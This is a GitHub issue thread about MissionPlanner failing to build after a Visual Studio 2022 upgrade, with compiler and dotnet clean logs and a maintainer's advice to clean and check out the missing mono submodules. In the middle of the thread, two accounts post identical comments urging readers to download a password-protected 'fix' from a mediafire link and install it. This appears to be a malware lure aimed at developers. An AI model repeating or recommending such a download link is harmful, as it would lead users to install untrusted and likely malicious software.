ArduPilot/MissionPlanner #3396: Latest Visual Studio 2022 upgrade broke the build

tribbloid, 2024-08-27:
#### Issue details
_Please describe the problem, or desired feature_

after upgrading IDE, many dll can no longer be found on compilation

#### Version
_What version was the issue encountered with_

1.3.82

#### Platform
[  ] All
[  ] AntennaTracker
[  ] Copter
[  ] Plane
[  ] Rover
[  ] Sub

#### Airframe type
_What type of airframe (flying wing, glider, hex, Y6, octa etc)_

N/A: this is a compilation error

#### Hardware type
_What autopilot hardware was used? (pixhawk, pixracer, PX4FMU etc)_

N/A: this is a compilation error

#### Logs
_Please provide a link to any relevant logs that show the issue_

The following error was encountered when opening MissionPlanner.sln and recompile immediately

```
Severity	Code	Description	Project	File	Line	Suppression State
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\MissionPlanner.Drawing\bin\Debug\netstandard2.0\MissionPlanner.Drawing.dll' could not be found	MissionPlanner.Drawing.Common	D:\git\MissionPlanner\ExtLibs\MissionPlanner.Drawing.Common\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\MissionPlanner.Drawing\bin\Debug\netstandard2.0\MissionPlanner.Drawing.dll' could not be found	System.Drawing.android	D:\git\MissionPlanner\ExtLibs\System.Drawing.android\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\MissionPlanner.Drawing\bin\Debug\netstandard2.0\MissionPlanner.Drawing.dll' could not be found	NMEA2000 (net6.0), NMEA2000 (netstandard2.0)	D:\git\MissionPlanner\ExtLibs\NMEA2000\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\Utilities\bin\Debug\netstandard2.0\MissionPlanner.Utilities.dll' could not be found	NMEA2000 (net6.0), NMEA2000 (netstandard2.0)	D:\git\MissionPlanner\ExtLibs\NMEA2000\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\MissionPlanner.Drawing\bin\Debug\netstandard2.0\MissionPlanner.Drawing.dll' could not be found	Onvif	D:\git\MissionPlanner\ExtLibs\Onvif\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\Utilities\bin\Debug\netstandard2.0\MissionPlanner.Utilities.dll' could not be found	Onvif	D:\git\MissionPlanner\ExtLibs\Onvif\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\ArduPilot\bin\Debug\netstandard2.0\MissionPlanner.ArduPilot.dll' could not be found	Flasher	D:\git\MissionPlanner\ExtLibs\Flasher\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\Controls\bin\Debug\net472\MissionPlanner.Controls.dll' could not be found	Flasher	D:\git\MissionPlanner\ExtLibs\Flasher\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\MissionPlanner.Drawing\bin\Debug\netstandard2.0\MissionPlanner.Drawing.dll' could not be found	Flasher	D:\git\MissionPlanner\ExtLibs\Flasher\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\Utilities\bin\Debug\netstandard2.0\MissionPlanner.Utilities.dll' could not be found	Flasher	D:\git\MissionPlanner\ExtLibs\Flasher\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\GDAL\bin\Debug\net472\GDAL.NET.dll' could not be found	AltitudeAngelWings.Plugin	D:\git\MissionPlanner\ExtLibs\AltitudeAngelWings.Plugin\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\Antenna\bin\Debug\netstandard2.0\MissionPlanner.Antenna.dll' could not be found	AltitudeAngelWings.Plugin	D:\git\MissionPlanner\ExtLibs\AltitudeAngelWings.Plugin\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\ArduPilot\bin\Debug\netstandard2.0\MissionPlanner.ArduPilot.dll' could not be found	AltitudeAngelWings.Plugin	D:\git\MissionPlanner\ExtLibs\AltitudeAngelWings.Plugin\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\Controls\bin\Debug\net472\MissionPlanner.Controls.dll' could not be found	AltitudeAngelWings.Plugin	D:\git\MissionPlanner\ExtLibs\AltitudeAngelWings.Plugin\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\MissionPlanner.Drawing\bin\Debug\netstandard2.0\MissionPlanner.Drawing.dll' could not be found	AltitudeAngelWings.Plugin	D:\git\MissionPlanner\ExtLibs\AltitudeAngelWings.Plugin\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\bin\Debug\net461\MissionPlanner.exe' could not be found	AltitudeAngelWings.Plugin	D:\git\MissionPlanner\ExtLibs\AltitudeAngelWings.Plugin\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\HIL\bin\Debug\netstandard2.0\MissionPlanner.HIL.dll' could not be found	AltitudeAngelWings.Plugin	D:\git\MissionPlanner\ExtLibs\AltitudeAngelWings.Plugin\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\Maps\bin\Debug\net472\MissionPlanner.Maps.dll' could not be found	AltitudeAngelWings.Plugin	D:\git\MissionPlanner\ExtLibs\AltitudeAngelWings.Plugin\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\Utilities\bin\Debug\netstandard2.0\MissionPlanner.Utilities.dll' could not be found	AltitudeAngelWings.Plugin	D:\git\MissionPlanner\ExtLibs\AltitudeAngelWings.Plugin\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\Onvif\bin\Debug\netstandard2.0\Onvif.dll' could not be found	AltitudeAngelWings.Plugin	D:\git\MissionPlanner\ExtLibs\AltitudeAngelWings.Plugin\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\tlogThumbnailHandler\bin\Debug\net472\tlogThumbnailHandler.dll' could not be found	AltitudeAngelWings.Plugin	D:\git\MissionPlanner\ExtLibs\AltitudeAngelWings.Plugin\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\GDAL\bin\Debug\net472\GDAL.NET.dll' could not be found	OpenDroneID_Plugin (net472)	D:\git\MissionPlanner\Plugins\OpenDroneID2\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\Antenna\bin\Debug\netstandard2.0\MissionPlanner.Antenna.dll' could not be found	OpenDroneID_Plugin (net472)	D:\git\MissionPlanner\Plugins\OpenDroneID2\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\ArduPilot\bin\Debug\netstandard2.0\MissionPlanner.ArduPilot.dll' could not be found	OpenDroneID_Plugin (net472)	D:\git\MissionPlanner\Plugins\OpenDroneID2\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\Controls\bin\Debug\net472\MissionPlanner.Controls.dll' could not be found	OpenDroneID_Plugin (net472)	D:\git\MissionPlanner\Plugins\OpenDroneID2\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\MissionPlanner.Drawing\bin\Debug\netstandard2.0\MissionPlanner.Drawing.dll' could not be found	OpenDroneID_Plugin (net472)	D:\git\MissionPlanner\Plugins\OpenDroneID2\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\bin\Debug\net461\MissionPlanner.exe' could not be found	OpenDroneID_Plugin (net472)	D:\git\MissionPlanner\Plugins\OpenDroneID2\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\HIL\bin\Debug\netstandard2.0\MissionPlanner.HIL.dll' could not be found	OpenDroneID_Plugin (net472)	D:\git\MissionPlanner\Plugins\OpenDroneID2\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\Maps\bin\Debug\net472\MissionPlanner.Maps.dll' could not be found	OpenDroneID_Plugin (net472)	D:\git\MissionPlanner\Plugins\OpenDroneID2\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\Utilities\bin\Debug\netstandard2.0\MissionPlanner.Utilities.dll' could not be found	OpenDroneID_Plugin (net472)	D:\git\MissionPlanner\Plugins\OpenDroneID2\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\Onvif\bin\Debug\netstandard2.0\Onvif.dll' could not be found	OpenDroneID_Plugin (net472)	D:\git\MissionPlanner\Plugins\OpenDroneID2\CSC	1	
Error (active)	CS0006	Metadata file 'D:\git\MissionPlanner\ExtLibs\tlogThumbnailHandler\bin\Debug\net472\tlogThumbnailHandler.dll' could not be found	OpenDroneID_Plugin (net472)	D:\git\MissionPlanner\Plugins\OpenDroneID2\CSC	1	

```

meee1, 2024-08-27:
Run a clean first.  

I can see it skipping a rebuild then Erroring about the file not existing 

Also if wasm is building, disable it

praveenking945, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

FoioMikael, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

tribbloid, 2024-08-28:
just ran a `dotnet clean`, and it is reporting some missing in the ExtLib:

```
$ dotnet clean MissionPlanner.sln 
Build started 2024-08-27 10:38:05 PM.
     1>Project "D:\git\MissionPlanner\MissionPlanner.sln" on node 1 (Clean target(s)).
     1>ValidateSolutionConfiguration:
         Building solution configuration "Debug|Any CPU".
       ValidateProjects:
         The project "Updater" is not selected for building in solution configuration "Debug|Any CPU".
         The project "SikRadio" is not selected for building in solution configuration "Debug|Any CPU".
         The project "wasm" is not selected for building in solution configuration "Debug|Any CPU".
         The project "WindowsStore" is not selected for building in solution configuration "Debug|Any CPU".
         The project "Dowding" is not selected for building in solution configuration "Debug|Any CPU".
         The project "MissionPlannerTests" is not selected for building in solution configuration "Debug|Any CPU".
     1>D:\git\MissionPlanner\MissionPlanner.sln.metaproj : error MSB3202: The project file "D:\git\MissionPlanner\ExtLibs\mono\mcs\class\System.Runtime.Serialization.Formatters.Soap\System.Runtime.Serialization.Formatters.Soap-net_4_x.csproj" was not found. [D:
       \git\MissionPlanner\MissionPlanner.sln]
     1>D:\git\MissionPlanner\MissionPlanner.sln.metaproj : error MSB3202: The project file "D:\git\MissionPlanner\ExtLibs\mono\mcs\class\Accessibility\Accessibility-net_4_x.csproj" was not found. [D:\git\MissionPlanner\MissionPlanner.sln]
     1>Project "D:\git\MissionPlanner\MissionPlanner.sln" (1) is building "D:\git\MissionPlanner\ExtLibs\Ntrip\Ntrip.csproj" (12) on node 8 (Clean target(s)).
    12>Project "D:\git\MissionPlanner\ExtLibs\Ntrip\Ntrip.csproj" (12) is building "D:\git\MissionPlanner\ExtLibs\Ntrip\Ntrip.csproj" (12:2) on node 8 (Clean target(s)).
    12>C:\Program Files\dotnet\sdk\8.0.400\Sdks\Microsoft.NET.Sdk\targets\Microsoft.NET.EolTargetFrameworks.targets(32,5): warning NETSDK1138: The target framework 'netcoreapp3.1' is out of support and will not receive security updates in the future. Please ref 
       er to https://aka.ms/dotnet-core-support for more information about the support policy. [D:\git\MissionPlanner\ExtLibs\Ntrip\Ntrip.csproj::TargetFramework=netcoreapp3.1]
     1>Project "D:\git\MissionPlanner\MissionPlanner.sln" (1) is building "D:\git\MissionPlanner\ExtLibs\Mock\Mock.csproj" (73) on node 5 (Clean target(s)).
    73>C:\Users\pengc\.nuget\packages\system.codedom\8.0.0\buildTransitive\netcoreapp2.0\System.CodeDom.targets(4,5): warning : System.CodeDom 8.0.0 doesn't support netcoreapp3.1 and has not been tested with it. Consider upgrading your TargetFramework to net6.0 
        or later. You may also set <SuppressTfmSupportBuildWarnings>true</SuppressTfmSupportBuildWarnings> in the project file to ignore this warning and attempt to run in this unsupported configuration at your own risk. [D:\git\MissionPlanner\ExtLibs\Mock\Mock 
       .csproj]
    73>C:\Users\pengc\.nuget\packages\system.management\8.0.0\buildTransitive\netcoreapp2.0\System.Management.targets(4,5): warning : System.Management 8.0.0 doesn't support netcoreapp3.1 and has not been tested with it. Consider upgrading your TargetFramework  
       to net6.0 or later. You may also set <SuppressTfmSupportBuildWarnings>true</SuppressTfmSupportBuildWarnings> in the project file to ignore this warning and attempt to run in this unsupported configuration at your own risk. [D:\git\MissionPlanner\ExtLibs\ 
       Mock\Mock.csproj]
    73>C:\Program Files\dotnet\sdk\8.0.400\Sdks\Microsoft.NET.Sdk\targets\Microsoft.NET.EolTargetFrameworks.targets(32,5): warning NETSDK1138: The target framework 'netcoreapp3.1' is out of support and will not receive security updates in the future. Please ref 
       er to https://aka.ms/dotnet-core-support for more information about the support policy. [D:\git\MissionPlanner\ExtLibs\Mock\Mock.csproj]
    73>C:\Program Files\dotnet\sdk\8.0.400\Microsoft.Common.CurrentVersion.targets(1890,5): warning NU1702: ProjectReference 'D:\git\MissionPlanner\ExtLibs\MavlinkMessagePlugin\MavlinkMessagePlugin.csproj' was resolved using '.NETFramework,Version=v4.7.2' inste
       ad of the project target framework '.NETCoreApp,Version=v3.1'. This project may not be fully compatible with your project. [D:\git\MissionPlanner\ExtLibs\Mock\Mock.csproj]
    73>C:\Program Files\dotnet\sdk\8.0.400\Microsoft.Common.CurrentVersion.targets(1890,5): warning NU1702: ProjectReference 'D:\git\MissionPlanner\MissionPlanner.csproj' was resolved using '.NETFramework,Version=v4.7.2' instead of the project target framework 
       '.NETCoreApp,Version=v3.1'. This project may not be fully compatible with your project. [D:\git\MissionPlanner\ExtLibs\Mock\Mock.csproj]
    73>C:\Program Files\dotnet\sdk\8.0.400\Microsoft.Common.CurrentVersion.targets(1890,5): warning NU1702: ProjectReference 'D:\git\MissionPlanner\ExtLibs\Xamarin.Forms.Platform.WinForms\Xamarin.Forms.Platform.WinForms.csproj' was resolved using '.NETFramework 
       ,Version=v4.7.2' instead of the project target framework '.NETCoreApp,Version=v3.1'. This project may not be fully compatible with your project. [D:\git\MissionPlanner\ExtLibs\Mock\Mock.csproj]
    73>C:\Program Files\dotnet\sdk\8.0.400\Microsoft.Common.CurrentVersion.targets(1890,5): warning NU1702: ProjectReference 'D:\git\MissionPlanner\ExtLibs\GDAL\GDAL.NET.csproj' was resolved using '.NETFramework,Version=v [... cut ...]
         D:\git\MissionPlanner\MissionPlanner.sln.metaproj : error MSB3202: The project file "D:\git\MissionPlanner\ExtLibs\mono\mcs\class\System.Runtime.Serialization.Formatters.Soap\System.Runtime.Serialization.Formatters.Soap-net_4_x.csproj" was not found. [ 
       D:\git\MissionPlanner\MissionPlanner.sln]
         D:\git\MissionPlanner\MissionPlanner.sln.metaproj : error MSB3202: The project file "D:\git\MissionPlanner\ExtLibs\mono\mcs\class\Accessibility\Accessibility-net_4_x.csproj" was not found. [D:\git\MissionPlanner\MissionPlanner.sln]

    9 Warning(s)
    2 Error(s)
```

both are under `MissionPlanner\ExtLibs\mono\mcs\class\`, so I don't think they are related to wasm

meee1, 2024-08-28:
ok, you need to checkout the submodules

you are missing everything in the mono directory